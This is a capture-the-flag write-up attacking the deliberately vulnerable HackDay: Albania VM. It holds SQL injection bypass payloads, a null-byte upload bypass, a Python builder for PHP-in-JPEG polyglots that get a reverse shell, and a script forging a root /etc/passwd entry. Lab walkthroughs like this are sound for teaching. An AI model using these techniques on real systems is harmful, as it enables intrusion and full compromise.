Let's do this. We have this VM from VulnHub called HackDay: Albania, which is a pretty awesome VM,
and it was quite a fight to pwn this box.
So after doing
we got the following IP address as a target: 192.168.1.13
So now let's scan all 65535 TCP ports on the target, with version detection (-p- is slow, but a default scan only covers the top 1000 ports):
nmap -v -sV -p- 192.168.1.13
which gives us the following output:
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So now we know that SSH is open, and they also seem to have moved the web server to port 8008, sneaky hehe.
So let's see what is on the website. We see a Mr. Robot background and a popup message which translates to "Welcome, If I am, I know where to go ;)". I thought that would be a reference to robots.txt; even if the hint wasn't there, it's the first thing I check when I encounter a web application.
output of http://192.168.1.13:8008/robots.txt:
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
Keep in mind that robots.txt is public by design: every Disallow entry is a path handed to anyone who reads the file. It keeps well-behaved crawlers out, not attackers.
After checking a few of them and getting trolled with an image of a dinosaur (Philosoraptor),
this one gives us a different message:
http://192.168.1.13:8008/unisxcudkqjydw IS there any /vulnbank/ in there ???
Alright, so we have a hint that there might be a folder called /vulnbank/ in there.
So we browse to this folder, and yup, directory listing is enabled, showing us a client folder,
and when we click on the folder named client, we get the bank website.
let's pwn the bank
On the bank website we see a username and password form, so let's see if the username field is vulnerable to SQL injection.
So let's type a single quote (') into the username field:
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102
The warning tells us two useful things: the query failed outright (mysqli returned false instead of a result set, so our quote broke the SQL), and the absolute path /var/www/html/unisxcudkqjydw/vulnbank/client/ is leaked. At first I tried to use sqlmap and dump the database, but that wasn't working since I couldn't retrieve any DBMS names.
So then I tried to bypass the login form with '# to comment out the rest of the query. That didn't return an error message, so we need a valid username now.
Let's intercept the request and send it to Burp Suite Intruder.
After brute-forcing the username with Burp Suite, this is the final payload to bypass the login form:
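To make the bypass concrete, here is an added example (mine, not the page's PHP and not the bank's real code) that rebuilds the two query styles in Python against an in-memory SQLite table. The table, the user alice and her password are constructed for the demo. SQLite has no # comment, so the payloads use the -- comment that works in both SQLite and MySQL; on the box's MySQL backend '# behaves the same way.

```python
import sqlite3


# Constructed sample user table standing in for the bank's users table.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    con.execute("INSERT INTO users (username, password) VALUES ('alice', 's3cret')")
    con.commit()
    return con


def login_vulnerable(con, username: str, password: str):
    """The query shape implied by the page's mysqli warning: user input is
    pasted straight into the SQL string, so quotes and comments are live."""
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (
        username,
        password,
    )
    # A syntactically broken query raises here; in the PHP app mysqli_query()
    # returned false and mysqli_fetch_assoc() complained about the boolean.
    return con.execute(sql).fetchone()


def login_safe(con, username: str, password: str):
    """Parameterised version: the driver sends values separately from the
    statement, so a quote in the username is just a character."""
    return con.execute(
        "SELECT id FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()


def probe(con, login, username: str, password: str):
    """Run one login attempt and report what the app would have seen."""
    try:
        return ("row", login(con, username, password))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    con = make_db()
    # A lone quote: broken SQL, which is what the warning on the page showed.
    print(probe(con, login_vulnerable, "'", ""))
    # Comment out the password check; works only with a username that exists.
    print(probe(con, login_vulnerable, "alice'-- ", "wrong"))
    print(probe(con, login_vulnerable, "bob'-- ", "wrong"))
    # Classic tautology: no valid username needed in a plain concatenated query.
    print(probe(con, login_vulnerable, "' OR 1=1-- ", "wrong"))
    # The same payloads are inert against the parameterised query.
    print(probe(con, login_safe, "alice'-- ", "wrong"))
    print(probe(con, login_safe, "alice", "s3cret"))
```

The `username'-- ` payload is the one that needs a real username, which is why brute-forcing it with Intruder was the next step; the parameterised query returns nothing for every payload and only logs alice in with her real password.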
bypassing the ticket system
Awesome, we bypassed the login. Now let's see if we can loot this bank, haha.
We can see there is a ticket upload system on the right side of the app. I'm pretty sure we need to upload a shell via the file upload in the ticket system.
First I tried uploading a normal .php file and got the following error:
After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...
OK, so we need to bypass this check. Let's try uploading the PHP file as .php%00.jpg, the old null-byte trick:
The file is uploaded successfully. Let's try to view it by dragging the broken image icon to the URL bar,
and we get the following error:
Warning: include(): Failed opening 'upload/php-reverse-shell.php' for inclusion (include_path='.:/usr/share/php') in /var/www/html/unisxcudkqjydw/vulnbank/client/view_file.php on line 13
We get an include error, so view_file.php passes the uploaded filename to PHP's include(). The "Failed opening" part means the null-byte name got us past the extension check without leaving a usable file at upload/php-reverse-shell.php, but the bigger news is the include() itself: include() parses whatever file it is given as PHP, whatever the extension says. So we can upload a real JPEG with PHP code embedded in it; the image bytes are echoed verbatim, the code between <?php and ?> executes, and it returns a shell to us.
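As an added illustration (example code of mine, not the pentestmonkey shell and nothing taken from the box), the following Python builds the kind of file that works here: a JPEG whose comment segment carries PHP, plus a toy model of what the upload filter and include() each see. The placeholder PHP and the extension allow-list are assumptions; on the box the payload was the pentestmonkey reverse shell.

```python
import struct

# Extension allow-list assumed from the upload error message on the page.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "bmp"}
PHP_OPEN, PHP_CLOSE = b"<?php", b"?>"


def passes_extension_filter(filename: str) -> bool:
    """Naive check of the kind the error message hints at: only the last
    extension is inspected, so 'shell.php\\x00.jpg' passes too (the null-byte
    trick relies on something downstream truncating the name at the NUL)."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def jpeg_with_php(php_code: bytes) -> bytes:
    """Minimal JPEG stream: SOI, one COM (comment) segment holding the PHP,
    EOI.  It satisfies magic-byte checks (FF D8 FF) and keeps the PHP inside
    a legitimate JPEG structure; for a real upload append the same COM
    segment to a genuine photo so image decoders are happy as well."""
    if len(php_code) + 2 > 0xFFFF:
        raise ValueError("a COM segment holds at most 65533 payload bytes")
    com = b"\xff\xfe" + struct.pack(">H", len(php_code) + 2) + php_code
    return b"\xff\xd8" + com + b"\xff\xd9"


def looks_like_jpeg(data: bytes) -> bool:
    """What a magic-byte sniffer such as file(1) or PHP's finfo looks at."""
    return data[:3] == b"\xff\xd8\xff" and data[-2:] == b"\xff\xd9"


def split_php(data: bytes):
    """Model of how include() consumes a file: bytes outside <?php ... ?>
    are sent to the client verbatim (here the image data), bytes inside are
    executed.  Returns a list of ('text', bytes) / ('php', bytes) pairs."""
    parts, pos = [], 0
    while True:
        start = data.find(PHP_OPEN, pos)
        if start == -1:
            if pos < len(data):
                parts.append(("text", data[pos:]))
            return parts
        if start > pos:
            parts.append(("text", data[pos:start]))
        body = start + len(PHP_OPEN)
        end = data.find(PHP_CLOSE, body)
        if end == -1:  # PHP allows omitting ?> at end of file
            parts.append(("php", data[body:]))
            return parts
        parts.append(("php", data[body:end]))
        pos = end + len(PHP_CLOSE)


if __name__ == "__main__":
    # Placeholder PHP; the write-up used the pentestmonkey reverse shell here.
    payload = jpeg_with_php(b"<?php echo 'embedded'; ?>")
    print(passes_extension_filter("shell.php"), passes_extension_filter("shell.php\x00.jpg"))
    print(looks_like_jpeg(payload))
    for kind, chunk in split_php(payload):
        print(kind, chunk)
```

Save the bytes as something.jpg and the file passes both an extension check and a magic-byte check, yet include() still finds and runs the PHP block. The fix on the server side is never to include() user-supplied files: serve uploads with readfile() from a directory the PHP handler does not execute.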
I used the pentestmonkey PHP reverse shell, but also tried an msfvenom meterpreter reverse_tcp payload and that worked as well. So now just set up an nc listener and catch your shell:
nc -lvp 4444
Now we can go back to our ticket, view the file, and we receive the shell ^_^
Note: if you want to catch a meterpreter shell you need to set up a multi/handler first.
Now that we have a shell, we can try to get a TTY shell with Python; however, in this case Python was not installed, so I used this:
script /dev/null -c bash
Voila, now we have a TTY shell.
Now we need to see how to get root on the box. First I checked the /home folder, but there was only a single user there, nothing interesting.
Let's see if there are any files we can write to (find checks this against the user we are running as, www-data here):
find / -writable -type f 2>/dev/null
We can see /etc/passwd is writable. If we add a user with UID 0 there we have root: when the second field of a passwd entry holds a hash instead of x, login and su check the password against that field and never consult /etc/shadow. So we copy the passwd file to our box and make a hashed password with:
openssl passwd -1
Password:
Verifying - Password:
$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv
test is the password.
Let's save the file and base64-encode it so we can paste it over. Note: don't forget the -w 0, otherwise the output is wrapped at 76 columns and you have problems pasting it over.
cat passwd | base64 -w 0
Now let's copy the base64 string, echo it on the target, decode it and write it into /etc/passwd (>> appends, which is all you need if you encoded just the new line; use > instead if you encoded the whole file):
echo "b64stringhere" | base64 -d >> /etc/passwd
Now let's check that /etc/passwd contains our new user:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
rootaccess:$1$snYvkX/A$Mk6h7Oxwx90/DotTuZJdv:0:0:rootaccess:/root:/bin/bash
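For readers who want to see what openssl passwd -1 is actually producing, and to script the whole passwd step instead of hand-editing, here is an added Python example (mine, not from the write-up). It implements MD5-crypt from the classic FreeBSD description, builds the UID-0 entry, and does the base64 -w 0 / base64 -d round trip. The username rootaccess and the salt snYvkX/A are taken from the page; the helper names and everything else are constructed for the example.

```python
import base64
import hashlib

# crypt(3)'s own base64 alphabet, not the RFC 4648 one.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Emit `count` characters, 6 bits at a time, least significant first."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5crypt(password: str, salt: str) -> str:
    """MD5-crypt ($1$), the scheme 'openssl passwd -1' emits.  The salt is at
    most 8 characters from the crypt alphabet; the 1000 rounds are deliberate."""
    pw, sb = password.encode(), salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    n = len(pw)
    while n > 0:                      # as many bytes of alt as pw has
        ctx.update(alt[: min(16, n)])
        n -= 16
    n = len(pw)
    while n:                          # the "something really weird" step
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # stretching rounds
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    enc += _to64(final[11], 2)
    return "$1$" + sb.decode() + "$" + enc


def passwd_line(user: str, password: str, salt: str, uid: int = 0, gid: int = 0,
                home: str = "/root", shell: str = "/bin/bash") -> str:
    """A passwd(5) entry with the hash inline.  Because field 2 is not 'x',
    login/su verify against this hash and never look at /etc/shadow."""
    return f"{user}:{md5crypt(password, salt)}:{uid}:{gid}:{user}:{home}:{shell}"


def parse_passwd_line(line: str) -> dict:
    """Sanity check before appending: seven colon-separated fields, numeric UID/GID."""
    f = line.rstrip("\n").split(":")
    if len(f) != 7:
        raise ValueError("passwd entries have exactly 7 fields")
    return {"user": f[0], "hash": f[1], "uid": int(f[2]), "gid": int(f[3]),
            "home": f[5], "shell": f[6]}


def to_blob(text: str) -> str:
    """Equivalent of 'base64 -w 0': one unwrapped line that survives pasting."""
    return base64.b64encode(text.encode()).decode()


def from_blob(blob: str) -> str:
    """Equivalent of 'base64 -d' on the target."""
    return base64.b64decode(blob).decode()


if __name__ == "__main__":
    line = passwd_line("rootaccess", "test", "snYvkX/A")
    print(line)
    print(parse_passwd_line(line))
    blob = to_blob(line + "\n")
    print(f'echo "{blob}" | base64 -d >> /etc/passwd')
    assert from_blob(blob) == line + "\n"
```

Feed it the salt and password you gave openssl and the two outputs should match character for character; the printed echo line is the exact command to paste into the shell on the target, and since it only carries the new entry, >> is the right operator.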
Now we can log in as the new user we created by doing
and we got root on the b0x, YEAH! ^_^
So all we have to do now is cat the flag.
thanks for reading my writeup.